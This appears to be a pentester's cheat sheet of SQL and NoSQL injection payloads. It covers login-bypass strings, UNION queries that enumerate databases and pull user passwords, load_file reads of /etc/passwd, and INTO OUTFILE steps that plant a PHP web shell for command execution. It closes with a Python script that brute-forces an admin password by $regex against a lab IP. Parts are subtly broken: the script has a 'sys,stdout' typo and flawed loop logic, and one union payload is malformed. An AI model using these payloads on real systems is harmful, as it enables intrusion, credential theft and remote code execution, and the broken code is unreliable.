# SQL Injection

' OR 1=1;--
' or 1=1 LIMIT 1 --
' or 1=1 --
' or 1=1 -- -
' or '1'='1 5
' or 1=1 --+ 
' or 1#

admin' OR 1=1;--
admin' or 1=1;# 
admin' or 1=1 LIMIT 1 -- -
admin' or 1=1 LIMIT 1;# 
admin' or 1=1 LIMIT 0,1;#

user'-- -                        # SQL error
user')-- -                       # No error
user') union select 1,2-- -      # Start enumerate columns

# check for sqli vulnerability
?id=1'

# find the number of columns
?id=1 order by 9 -- -

# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8,9 -- -

# Get the database name
?id=1 union select 1,2,3,4,database(),6,7,8,9 -- -

# Get all database names
?id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,group_concat(schema_name),NULL,NULL,NULL from information_schema.schemata -- -

# Get the tables from that database
?id=1 union select 1,2,3,4,UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one',6,7,8,9 -- - 

# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -

# Get version
?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -

# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -

# Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -

# Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users

# Read file
?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- -
?id=1 union select 1,2,3,4, load_file('/var/www/login.php') ,6,7,8,9 -- -

# create a file and call it to check if really created
?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- -

# create a file to get a shell - convert below string to hex
?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>' ,6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- -

# then go to browser and see if you can execute commands
http://<targetip>/shell.php?cmd=id

# Then use Pentest Monkey Reverse Shells to call your shell

username=admin' union select 1, LOAD_FILE("/etc/passwd"),2,3-- -&password=admin

# Content-Type: application/x-www-form-urlencoded
user=admin&password[$ne]=admin

// Change the POST Content-Type to application/json
{
	"user":"admin",
	"password":{
		"$ne":"admin"
	}
}

import requests
import json
import string
import sys

def login(pw):
	payload = '{ "$regex": "%s" }' % pw
	data = { "user":"admin", "password": json.loads(payload) }
	proxies = { 'http': 'http://127.0.0.1:8080' }
	#r = requests.post("http://10.129.96.160/login", json=data, proxies=proxies)
	r = requests.post("http://10.129.96.160/login", json=data)
	if "Invalid Password" in r.text:
		return False
	return True

password = '^'
stop = False
while stop == False:
	for i in string.ascii_letters:
		sys,stdout.write(f"\r{password}{i}")
		if login(f"{password}"):
			password += i
			if login(f"{password}$"):
				sys.stdout.write(f"\r{password}\r\n")
				sys.stdout.flush()
				stop = True
				break
			break